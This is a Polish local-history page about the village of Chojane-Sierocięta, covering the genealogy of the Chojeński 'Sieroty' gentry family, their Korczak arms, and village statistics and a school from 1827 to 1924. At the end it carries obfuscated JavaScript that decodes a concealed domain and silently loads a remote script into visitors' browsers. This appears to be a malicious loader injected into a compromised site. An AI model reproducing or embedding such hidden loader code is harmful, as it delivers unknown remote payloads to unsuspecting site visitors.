Chojane- Sierocięta

Ród Chojeńskich był dosyć liczny, wśród nich poszczególne gałęzie nosiły różne przydomki. Była też grupa Chojeńskich zwana Sierotami, mieszkali właśnie w tej wsi, więc wioskę nazwano Sierocięta. Na przykład w 1580 roku mieszkał tu Marcin, syn Jana Sieroty Chojeńskiego.
Sierocięta należą do południowej części okolicy szlacheckiej Chojane – ta część powstała później od północnej, bo dopiero w połowie XVI wieku. Część północna zapewne na przełomie XV i XVI wieku.
Mieszkali tu zatem Sieroty Chojeńscy i to właśnie mieszkańcy tej wsi udowodnili swe pochodzenie szlacheckie w XIX wieku z herbem Korczak, jako jedyni z Chojeńskich z tych okolic. Przedstawiciele tego rodu mieszkający tu w pierwszej połowie XIX stulecia przedstawili następującą genealogię. Na przełomie XVI i XVII wieku żył tutaj Jana Sierota Chojeński, który miał syna Piotra. Tenże Piotr miał syna Gabriela notowanego w 1665 roku. Gabriel miał syna Wawrzyńca, który miał trzech synów: Pawła, Idziego i Wojciecha. Paweł Chojeński ożenił się z Franciszką Kuleszą i miał z nią syna Jana, który dziedziczył w tej wsi w pierwszej połowie XIX wieku. Ożenił się on z Gertrudą Porowską i miał z nią syna Bartłomieja, żołnierza wojsk rosyjskich. Drugi z synów Wawrzyńca, Idzi ożenił się z Marianną Koskowską i miał z nią synów: Andrzeja i Antoniego, otrzymali oni potwierdzenia praw szlacheckich z 1847 roku. Trzeci z synów Wawrzyńca, Wojciech miał syna Walentego, ten syna Mikołaja, a ten Mikołaja, ten z kolei Wawrzyńca, który w 1862 roku służył w wojsku rosyjskim. Chojeńscy z tej wsi otrzymali stosowny dokument, dyplom, który potwierdzał prawo szlacheckie i używanie herbu Korczak. Dane z Tabelli Miast i Wsi z 1827 roku informują o 13 domach mieszkalnych oraz 74 mieszkańcach tej miejscowości. W końcu XIX stulecia istniało w tej wsi 18 gospodarstw drobnoszlacheckich na 139 ha ziemi (88 ha gruntów ornych), średnie gospodarstwo miało obszar 7,7 ha.
W 1921 roku było 18 domów i 126 mieszkańców, w tym 3 prawosławnych i jeden wyznania „niewiadomego”.
W rok później utworzono tutaj jednoklasową szkołę powszechną, liczącą początkowo 66 uczniów, w 1923 roku uczyło się tutaj już 72 dzieci – w roku 1924, z niewiadomych przyczyn, szkołę zlikwidowano.

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);